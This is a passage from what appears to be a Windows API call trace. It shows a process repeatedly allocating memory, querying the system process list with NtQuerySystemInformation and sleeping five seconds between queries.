Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.359] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.372] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.380] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.387] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.394] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.401] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.417] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.424] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.430] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.437] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.452] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.473] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.489] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.496] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.504] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 